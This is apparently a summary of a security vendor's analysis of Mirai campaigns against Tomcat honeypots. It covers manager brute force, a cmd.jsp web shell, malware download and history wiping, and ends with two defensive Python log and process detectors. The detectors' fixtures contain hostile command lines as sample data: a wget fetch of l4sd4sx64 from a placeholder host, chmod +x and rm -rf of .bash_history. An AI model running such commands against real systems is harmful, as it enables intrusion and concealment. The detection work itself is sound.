Tomcat Under Attack: Exploring Mirai Malware and Beyond

An analysis of Tomcat honeypot attacks shows that Mirai-driven campaigns dominated the activity, enabled by misconfigurations and brute-force access to the Tomcat manager that led to web shells and remote code execution. Attackers deploy WAR files containing a cmd.jsp web shell, then download Mirai malware (e.g., l4sd4sx64) for cryptomining or DDoS; the campaigns keep evolving, and Aqua's runtime CNDR tooling detected them. Hashtags: #Tomcat #Mirai #cmd.jsp #neww #l4sd4sx64

Keypoints

  • Over two years, 800+ attacks on Tomcat honeypots targeted misconfigurations and weak credentials to deploy web shells enabling remote code execution.
  • Payload categories identified: Mirai botnet (primarily DDoS and cryptomining), cryptominers, and Chaos Malware (a ransomware variant and a newer DDoS tool).
  • Approximately 96% of attacks were linked to Mirai, with 152 attacks (~20%) dropping a shell script named “neww” from 24 unique IPs; about 68% originated from a single IP.
  • Tomcat misconfigurations, including default credentials (e.g., tomcat:tomcat) and manager access controlled by tomcat-users.xml, were common attack surfaces reached via brute force.
  • Attack flow: brute-force gains access to the Tomcat web application manager, deploys a WAR with a malicious web shell (cmd.jsp), then downloads and executes Mirai components (e.g., l4sd4sx64) using wget/curl, chmod, and rm -rf.
  • MITRE-style defense evasion includes removing the command-history file in Linux to erase traces and hinder incident response.
  • Runtime detection by Aqua CNDR (eBPF in the Linux kernel) highlighted CNDR’s ability to capture these malicious actions in real time.
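As an added example (not code from the Aqua post), a small Python detector that runs over constructed Tomcat access-log lines and flags the attack flow described above: repeated 401s on /manager/, a successful manager login after failures, a WAR upload through the manager, and a cmd= request to a JSP. The threshold, log format, addresses and paths are assumptions.

```python
import re
from collections import defaultdict

# Constructed Tomcat access-log lines (common log format) for illustration only;
# the addresses, timestamps and paths are made up, not taken from the post.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [01/Mar/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - tomcat [01/Mar/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 200 17463
203.0.113.5 - tomcat [01/Mar/2024:10:00:05 +0000] "POST /manager/html/upload HTTP/1.1" 200 19321
203.0.113.5 - - [01/Mar/2024:10:00:07 +0000] "GET /app/cmd.jsp?cmd=id HTTP/1.1" 200 512
198.51.100.9 - - [01/Mar/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 11250
"""

LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")  # manager deploy endpoints
SHELL_RE = re.compile(r"\.jsp\?(?:.*&)?cmd=", re.IGNORECASE)      # cmd= passed to a JSP

def parse(log):
    """Yield (ip, user, method, path, status) for every well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, user, method, path, status = m.groups()
            yield ip, user, method, path, int(status)

def detect(log, bf_threshold=2):
    """Return [(ip, technique, detail)] for the manager-abuse chain, in log order."""
    findings, fails, noted = [], defaultdict(int), set()
    for ip, user, method, path, status in parse(log):
        is_manager = path.startswith("/manager/")
        if is_manager and status == 401:
            fails[ip] += 1
            if fails[ip] == bf_threshold:
                findings.append((ip, "T1110", f"{bf_threshold}+ failed manager logins"))
        elif is_manager and status == 200 and user != "-" and fails[ip] and (ip, "login") not in noted:
            noted.add((ip, "login"))
            findings.append((ip, "T1078", f"manager login as '{user}' after {fails[ip]} failures"))
        if method == "POST" and path.startswith(DEPLOY_PATHS) and status == 200:
            findings.append((ip, "T1505.003", f"WAR deployed via {path}"))
        if SHELL_RE.search(path):
            findings.append((ip, "T1059", f"command passed to JSP web shell: {path}"))
    return findings
```

A successful login with no preceding failures is deliberately not flagged, so routine administrator use of the manager stays quiet.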

MITRE Techniques

  • [T1110] Brute Force – The threat actor attempted to gain access to the Tomcat web application manager by trying different combinations of credentials; ‘The threat actor scanned for Tomcat servers and launched a brute force attack against it, attempting to gain access to the Tomcat web application manager by trying different combinations of credentials.’
  • [T1078] Valid Accounts – Access to the web application manager was achieved on the third try using the correct combination of credentials; ‘succeeded in gaining access to the web application manager on the third try by using the correct combination of credentials.’
  • [T1505.003] Web Shell – A WAR file deployed contained a malicious web shell (cmd.jsp) to enable remote command execution; ‘the web shell ‘cmd.jsp’ has been flagged as malicious by 35 vendors on VirusTotal.’
  • [T1105] Ingress Tool Transfer – The malware was downloaded from a remote server using wget or curl; ‘Use the wget or curl command to download the malware from the remote server.’
  • [T1059] Command and Scripting Interpreter – The web shell listened for requests and executed commands on the server, enabling remote execution; ‘the web shell was designed to listen to requests and execute commands on the server.’
  • [T1036] Masquerading – The attacker used a legitimate action (upload a WAR file) via the Tomcat manager to masquerade the attack; ‘Using a legitimate action via the manager app (i.e., upload a WAR file) as an attack vector allows the threat actor to masquerade the attack.’
  • [T1070.004] Clear Linux Command History – The attacker attempted to delete the file storing the last 500 commands to erase traces; ‘remove the file that stores the command history of the last 500 commands entered by the logged-in user in Linux.’
  • [T1496] Resource Hijacking – Mirai-based cryptomining campaigns were a major impact of the attacks; ‘DDoS and cryptomining campaigns.’
  • [T1486] Data Encrypted for Impact – Chaos Malware is described as an upgraded ransomware variant and also used in DDoS-related activities; ‘Chaos Malware: an upgraded version of a ransomware variant…’.
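Added example, not from the post and not Aqua CNDR's own logic: correlating process-exec events (the kind an eBPF tracer reports) so that the download, chmod and history-removal steps from the T1105, T1059 and T1070.004 items above are only flagged when they descend from the Tomcat JVM. The event shape, pid values, user names and EXAMPLE-HOST are constructed placeholders.

```python
import re

# Constructed exec events (pid, ppid, user, cmdline) of the kind an eBPF exec
# tracer reports; pid 100 stands in for the Tomcat JVM, EXAMPLE-HOST is a placeholder.
EVENTS = [
    (100, 1,   "tomcat", "java -Dcatalina.base=/opt/tomcat org.apache.catalina.startup.Bootstrap"),
    (201, 100, "tomcat", "/bin/sh -c cd /tmp; wget http://EXAMPLE-HOST/l4sd4sx64"),
    (202, 201, "tomcat", "wget http://EXAMPLE-HOST/l4sd4sx64"),
    (203, 100, "tomcat", "/bin/sh -c chmod +x /tmp/l4sd4sx64"),
    (204, 203, "tomcat", "chmod +x /tmp/l4sd4sx64"),
    (205, 100, "tomcat", "/bin/sh -c rm -rf /home/tomcat/.bash_history"),
    (206, 205, "tomcat", "rm -rf /home/tomcat/.bash_history"),
    (300, 1,   "root",   "/usr/sbin/cron -f"),
    (301, 300, "root",   "wget -q https://EXAMPLE-HOST/updates.txt"),  # benign: not under the JVM
]

SHELLS = {"sh", "bash", "dash"}
STAGES = [  # technique tag and pattern matched against the command line
    ("T1105", re.compile(r"^(wget|curl)\b")),
    ("chmod+x", re.compile(r"^chmod\b.*\+x")),
    ("T1070.004", re.compile(r"^rm\b.*\.bash_history")),
]

def tool_name(cmd):
    return cmd.split()[0].rsplit("/", 1)[-1]

def detect(events):
    parent = {pid: ppid for pid, ppid, _, _ in events}
    jvm = {pid for pid, _, _, cmd in events if tool_name(cmd) == "java"}
    def under_jvm(pid):
        while pid in parent:  # climb until we leave the recorded tree
            pid = parent[pid]
            if pid in jvm:
                return True
        return False

    findings, seen = [], set()
    for pid, ppid, _, cmd in events:
        if not under_jvm(pid):
            continue  # the same commands elsewhere (cron, admins) are not flagged
        if tool_name(cmd) in SHELLS and ppid in jvm:
            findings.append(("T1059", pid, cmd))  # the JVM should not spawn shells
            continue
        for tag, rx in STAGES:
            if rx.search(cmd):
                seen.add(tag)
                findings.append((tag, pid, cmd))
    if {"T1105", "chmod+x", "T1070.004"} <= seen:
        findings.append(("chain", None, "download, chmod +x and history wipe under the JVM"))
    return findings
```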

Indicators of Compromise


Read more: https://blog.aquasec.com/tomcat-under-attack-investigating-the-mirai-malware